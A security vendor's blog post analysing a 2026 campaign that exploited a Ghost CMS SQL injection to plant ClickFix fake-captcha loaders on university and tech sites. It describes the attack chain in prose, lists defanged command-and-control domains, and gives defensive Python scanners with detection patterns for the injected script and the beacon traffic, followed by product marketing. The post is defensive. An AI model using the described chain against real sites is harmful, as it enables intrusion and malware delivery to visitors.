Tags: ClickFix, Watering Hole, Traffic Analysis, CMS Security

Ghost CMS, ClickFix and the Watering Hole That Wears Harvard's Hostname

CVE-2026-26980 turned 700+ Ghost CMS sites into ClickFix watering holes — Harvard, Oxford and DuckDuckGo among them. The host you trusted is now the distributor.

Zero Hunt Research · 9 min read

Last week the article you read on harvard.edu was not the article Harvard published. It had a JavaScript loader appended at the bottom of the page, a cloaked script that fingerprinted your browser, and — if you passed the filter — an overlay that asked you to verify you were human by pasting a command into Windows Run. The same was true on oxford.ac.uk, on auburn.edu, on a DuckDuckGo property, and on 700+ other domains identified by XLab between 7 and 17 May 2026. The CMS behind all of them was Ghost. The vulnerability behind the JavaScript was CVE-2026-26980, a SQL injection in Ghost's Content API that was patched in February.

Three months of unpatched installs were enough to turn the trust signal inside out. The host name your URL allow-list trusted, the certificate your browser trusted, the CDN cache that fronted the request — all of them green-lit a payload that none of them had ever seen, because the payload was being served by the publisher itself.

The Ghost CMS perimeter that wasn't a perimeter

CVE-2026-26980 was disclosed on 19 February 2026. The CVSS vector reads AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L: unauthenticated, reachable over the network, low attack complexity, high confidentiality impact (a full read of the database), high integrity impact and low availability impact. GitHub's CNA scored it 9.4. NIST scored it 7.5 on the more conservative confidentiality-only reading. Affected versions ran from 3.24.0 to 6.19.0; the fix was 6.19.1. The Ghost team's advisory was explicit: because the Content API key is publicly accessible by design, the only application-level workaround is a WAF rule blocking the literal substring slug:[ in query parameters, and that rule risks breaking legitimate functionality.

SentinelOne reported first in-wild exploitation on 27 February — eight days after the patch. The mass campaign documented by XLab landed more than two months later, on 7 May, against an estate that had clearly not all upgraded. The attack chain was not subtle:

  1. Hit the Content API with the SQLi payload, read out the admin API key from the database.
  2. Authenticate to Ghost's Admin API with the stolen key.
  3. Use the Admin API's article-edit endpoint to append a <script> tag — fingerprintable as ghost_once_footer_* — to every post on the site.
  4. The script loaded a two-stage cloaker derived from the commercial Adspect traffic-distribution kit. Crawlers, security scanners, IPs from cloud ASNs, and visitors who failed a browser-fingerprint check were served the original article unchanged.
  5. Visitors who passed the filter received an iframe overlay imitating Cloudflare's "verify you are human" interstitial — the ClickFix lure.
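Step 3 is the part a site operator can audit directly: every post's rendered HTML either ends with the appended loader or it does not. The scanner below is an added example (not Ghost's code or the researchers' tooling); it assumes the ghost_once_footer_ marker appears inside the injected script tag and that SCRIPT_ALLOWLIST holds the script hosts the site legitimately loads, and its sample posts are constructed.

```python
# Audit rendered Ghost post HTML for an appended loader <script>.
# Added example, not Ghost's code. Assumes the ghost_once_footer_ marker from
# the writeup appears inside the injected <script> (attribute value or inline
# body); SCRIPT_ALLOWLIST and the sample posts below are constructed for the demo.
from html.parser import HTMLParser
from urllib.parse import urlsplit

MARKER = "ghost_once_footer_"
SCRIPT_ALLOWLIST = {"cdn.jsdelivr.net"}   # constructed: hosts this site legitimately loads


class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = {"attrs": dict(attrs), "body": ""}
    def handle_data(self, data):
        if self._open is not None:          # inline body of the open <script>
            self._open["body"] += data
    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(self._open)
            self._open = None


def audit_post(post_id: str, html: str) -> list:
    """One (post_id, reason, detail) tuple per suspicious <script>; [] if clean."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        blob = " ".join(str(v) for v in s["attrs"].values()) + s["body"]
        src = s["attrs"].get("src") or ""
        host = urlsplit(src).hostname
        if MARKER in blob:                                # the campaign's own fingerprint
            findings.append((post_id, "marker", src or "inline"))
        elif host and host not in SCRIPT_ALLOWLIST:       # any other third-party loader
            findings.append((post_id, "unlisted-host", host))
    return findings


def audit_all(posts: dict) -> list:
    return [f for pid, html in posts.items() for f in audit_post(pid, html)]


# Constructed sample: one clean post and one with the loader appended at the end.
POSTS = {
    "clean-post": '<p>Hello</p><script src="https://cdn.jsdelivr.net/lib.js"></script>',
    "poisoned-post": '<p>Hello</p><script id="ghost_once_footer_x" '
                     'src="https://script-dev.digital/loader.js"></script>',
}
```

Run it over the html field of every post the Content API returns, not a cached copy, because the cloaker serves the original article to anything that looks like a scanner.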

The breakdown of compromised sites is not a long-tail noise distribution. Per XLab's telemetry: personal blogs 48.1%, SaaS/tech 14.8%, AI/ML 4.6%, crypto/Web3 2.9%. That tilts heavily toward audiences whose laptops have CI credentials, source-code checkouts, AWS sessions, and wallet keys. The attackers chose Ghost not because it is popular but because the audience of Ghost-hosted publications is high-value per click.

What ClickFix actually delivers in 2026

ClickFix is not a vulnerability. It is a UX exploit against the Windows Run dialog and the user's clipboard. The fake captcha copies a PowerShell one-liner to the clipboard, then instructs the user to press Win+R and paste-and-run it to "complete verification". The pasted command typically resolves a domain, downloads a stager, and hands off to a second-stage loader. The chain is invisible to email filtering, EDR memory protection on the parent process, and most network egress controls — because the parent process is cmd.exe or powershell.exe launched by the human.

In the Ghost campaign, XLab tracked the chain through these C2 / staging domains used by the two operator clusters they identified:

  Operator          Domains used
  Threat Actor A    clo4shara[.]xyz, cloud-verification[.]com, jalwat[.]com, com-apps[.]cc, web-telegram[.]ug
  Threat Actor B    staticcloudflare[.]pro, script-dev[.]digital, script-dev[.]buzz, cdnupdatenews[.]top

The final payload the team reverse-engineered was UtilifySetup.exe (MD5 18a7251ddde77ed24bc54700d84d9be1), an Inno Setup installer wrapping a modified Electron build derived from the open-source Grape project. It establishes persistence via setLoginItemSettings and beacons to C2 every 30 seconds, awaiting instructions that can run arbitrary JavaScript or execute additional binaries.

The Ghost campaign is one of many. Microsoft Threat Intelligence identifies Lumma Stealer as the most prolific ClickFix payload and tracks campaigns hitting "thousands of enterprise and end-user devices globally every day." Sekoia documented a single WordPress-targeting framework, IClickFix, compromising more than 3,800 sites across 82 countries since December 2024. ClickFix kits are sold on monthly subscription for $200–$1,500. Huntress identified a January 2026 variant called CrashFix that crashes Chrome on purpose and then presents a fake recovery prompt. Microsoft documented a February 2026 DNS-tunnelled variant where the pasted command pulls its second-stage URL out of an nslookup reply, bypassing URL-based blocklists entirely.

Why allow-lists, reputation feeds and CDN edges go blind

The defensive layers that block bad traffic from getting in are looking the wrong way for this attack class. Consider what happens when an analyst's laptop fetches an article from harvard.edu:

  • The DNS resolver answers with Harvard's IP. The reputation tier rates that domain "permit".
  • The TLS handshake completes against a Cloudflare edge holding a valid Harvard wildcard certificate. The certificate-transparency log does not flag it.
  • The corporate proxy logs an HTTPS GET with Referer: <internal Slack>, status 200, 184 KB response. The category is Education.
  • The SIEM correlates none of this with anything because none of it is anomalous.

Forty seconds later, the same laptop opens a connection to script-dev[.]digital over TLS 1.3, fetches a 12 KB JavaScript blob, and follows that with an HTTPS request to com-apps[.]cc/11z77u3.php. Eight minutes after that, a freshly launched powershell.exe reaches out to cdnupdatenews[.]top over 443 every thirty seconds, with a payload size distribution that matches an Electron beacon.

Almost every layer in the first sequence said trust. The second sequence is the actual breach. The question every defender should be asking right now is: which layer in your stack sees the link between the first and the second, in time to interrupt the beacon?

"We had clean logs from the URL filter, clean logs from the EDR, clean logs from the CASB. The first thing that told us something was wrong was an outbound flow our NDR labelled as a never-seen Electron beacon to a domain registered six days earlier. The visit to the poisoned article was twelve minutes before that. None of the upstream controls saw it because they were all looking at the source."

That is approximately the conversation we have with security teams every week. The source is reputable. The destination is not. The window between them is short. None of the conventional reputation-and-category layers were architected to close it.

The detection surface is the network, while the beacon is alive

The only sensor that catches this class of attack reliably is one looking at the traffic, not at the URL category or the file hash. Three behavioural signatures are visible to wire-speed deep-learning models within seconds of the first beacon:

  • Domain newness vs session profile. A domain absent from the laptop's 30-day baseline, registered more recently than that baseline window, contacted within minutes of a browser session that finished a fetch to an unrelated reputable host, and then polled at a sustained 30-second cadence.
  • Application-fingerprint mismatch. TLS JA4/JA4S signatures and packet-size distributions that say Electron, not Chrome — emerging from a host whose normal profile is browser-only.
  • C2 cadence vs human cadence. Periodic outbound on a non-business-hours schedule, with payload entropy and inter-arrival times that match a beacon, not a polling app.
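The first and third signatures, and the harvard.edu-to-cdnupdatenews[.]top sequence traced earlier, reduce to a check a SOC can run on its own flow logs. The code below is an added example, not Zero Hunt's model: a plain statistical pass over constructed flow records, with a constructed 30-day baseline and constructed registration ages (in practice from RDAP/WHOIS); the JA4 and payload-entropy signals are left out.

```python
# Flag a beacon to a never-seen, newly registered domain that follows a fetch
# from a reputable host. Added example, not Zero Hunt's model: a plain
# statistical check over flow records. The flows, baseline and registration
# ages below are all constructed for the demo (ages would come from RDAP/WHOIS).
from datetime import datetime, timedelta
from statistics import median, pstdev

BASELINE_WINDOW_DAYS = 30
PRECEDE_WINDOW = timedelta(minutes=15)              # "within minutes" of a reputable fetch
MIN_BEACONS, TARGET_PERIOD, MAX_CV = 6, 30.0, 0.2   # cadence expected of the Electron beacon

# Constructed flow log for one laptop: (timestamp, destination domain).
T0 = datetime(2026, 5, 12, 9, 0, 0)
FLOWS = [(T0, "harvard.edu"),
         (T0 + timedelta(seconds=40), "script-dev.digital"),
         (T0 + timedelta(seconds=41), "com-apps.cc")]
FLOWS += [(T0 + timedelta(seconds=520 + 30 * i + i % 2), "cdnupdatenews.top") for i in range(8)]
FLOWS += [(T0 + timedelta(seconds=60 * i), "slack.com") for i in range(10)]   # baseline polling app

BASELINE_DOMAINS = {"harvard.edu", "slack.com"}     # seen in the last 30 days
DOMAIN_AGE_DAYS = {"harvard.edu": 9000, "slack.com": 5000, "script-dev.digital": 10,
                   "com-apps.cc": 12, "cdnupdatenews.top": 6}


def detect_beacons(flows, baseline, ages):
    """Return one alert dict per domain that is new to this host, newly
    registered and contacted on a regular ~30 s cadence, together with the
    reputable hosts fetched shortly before the first contact."""
    flows = sorted(flows)
    alerts = []
    for domain in sorted({d for _, d in flows} - baseline):
        if ages.get(domain, 0) >= BASELINE_WINDOW_DAYS:
            continue                                   # new to the host, but not newly registered
        times = [t for t, d in flows if d == domain]
        if len(times) < MIN_BEACONS:
            continue                                   # one-off fetch, nothing to measure
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med == 0 or abs(med - TARGET_PERIOD) > 0.2 * TARGET_PERIOD or pstdev(gaps) / med > MAX_CV:
            continue                                   # irregular timing: human, not a beacon
        before = [d for t, d in flows if d in baseline and times[0] - PRECEDE_WINDOW <= t < times[0]]
        alerts.append({"domain": domain, "first_seen": times[0], "beacons": len(times),
                       "median_period_s": med, "age_days": ages[domain],
                       "preceded_by": sorted(set(before))})
    return alerts
```

The one-off fetches to script-dev.digital and com-apps.cc are new and young but have no cadence, so they surface only once the beacon to cdnupdatenews.top ties them to the same session; the in-baseline Slack polling is never considered.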

None of these need a known IOC. None of them need a signature for UtilifySetup.exe. They are behavioural signals that a wire-speed traffic ML model picks up the first time the beacon fires — which is also the first opportunity to interrupt it before lateral movement or credential exfiltration happens. For the same reason, mid-encryption ransomware and mid-egress data exfiltration are caught by the same class of sensor: the network sees the consequence of the breach before the disk or the SIEM does.

For the CMS operator: the perimeter you actually need to validate

If you run a Ghost installation, or a WordPress site, or a Drupal stack — and the past 30 days proved you can run all three at once — the operational question is not "are we patched?". It is: would a continuous adversarial validation catch the exploit chain end-to-end on our specific deployment, this week, against the version we are actually running, including the WAF rules that were supposed to mitigate the unpatched window?

That is the gap between a quarterly pentest and a continuous one. CVE-2026-26980 was patched on 19 February. The mass campaign hit on 7 May. The 77-day window in between is exactly the cadence at which annual or quarterly assessment cycles fail: the report on your desk says "Ghost up to date as of last audit" while the live instance is two minor versions behind because someone deferred the upgrade. Continuous validation closes that window because it re-runs the chain — recon → exploit → API key extraction → article modification — on every cadence, against the deployment as it actually is, not as it was at last audit.

How Zero Hunt closes both halves of this

This article is about a class of attack that has two distinct defensive surfaces, and Zero Hunt's appliance is one of the few platforms that addresses both from a single sensor.

On the visitor side — the surface this article centres on — the AI Traffic Analysis pillar runs a proprietary deep-learning model with four parallel inference heads (suspicious traffic, malware classification, attack-type identification, application fingerprinting) at 2.7+ Gbit/s on the appliance GPU. It is the sensor that flags the never-seen Electron beacon to script-dev[.]digital thirty seconds after the laptop visited a poisoned article on harvard.edu, while the C2 channel is still alive and before the credential stealer has finished its first pass over the ~/.aws/ directory. It does this with the model running locally on the appliance, with no cloud callback and no telemetry leaving the network.

On the CMS-operator side, the 10-agent generative pentest swarm (Recon → Web → Exploit → Credential → Post-Exploit → Pivot → Tactic → Report, coordinated by the AI Controller) re-runs the CVE-2026-26980 chain end-to-end against your live deployment on every scheduled or change-triggered campaign — with each exploit written per-target by the local LLM, backtested in AI Gym against the 316-exercise Vulhub corpus before promotion, and the final evidence chain ECDSA-signed for the Trust Center bundle. If your patch state regresses, if a new asset shows up on the perimeter, or if a downstream WAF rule turns out not to mitigate what it claimed to mitigate, the chain runs and the result lands in the audit trail within the hour.

Both pillars run on the same on-prem appliance. No exploit and no traffic capture ever leaves the customer's network.

The publisher was Harvard. The distributor was Ghost. The defender now has to be the network.


Sources for this article — XLab/Qianxin technical writeup, 7–24 May 2026; BleepingComputer, 24 May 2026; NVD CVE-2026-26980; GitHub advisory GHSA-w52v-v783-gw97; Microsoft Threat Intelligence on ClickFix; SentinelOne CVE database.
